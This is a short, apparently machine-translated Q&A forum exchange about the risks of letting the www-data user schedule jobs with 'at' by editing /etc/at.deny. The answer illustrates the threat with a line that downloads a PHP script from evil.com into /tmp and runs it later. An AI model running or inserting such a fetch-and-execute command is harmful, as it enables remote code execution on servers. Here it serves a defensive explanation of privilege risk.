У меня есть cgi-скрипт, который повторно отправляет электронное письмо при неудачной попытке через 5-10 минут после того, как пользователь открывает страницу. Я думал сделать это с помощью at
команда из вызова python (os.system("at now + 5 minutes <<< ' python resend.py data'")
). Тестирование выявило:
$ sudo su www-data
$ at now
You do not have permission to use at.
$
Какого рода горе мне грозит, если я удаляю пользовательские www-данные из /etc/at.deny
файл?
внося это предлагаемое изменение, вы позволяете пользователю apache запускаться как выполнение заданий в будущем, в более позднее время .... я не знаю, это возможно, но если вы можете подорвать веб-сервер, чтобы выполнить что-то на стороне сервера, например
exec ("cd / tmp && wget http://evil.com/evil.php && позже /tmp/evil.php ")
это будет запускать загруженный скрипт php позже.
это в основном одноразовый cron, и, честно говоря, я обычно отключаю его в пользу jenkins.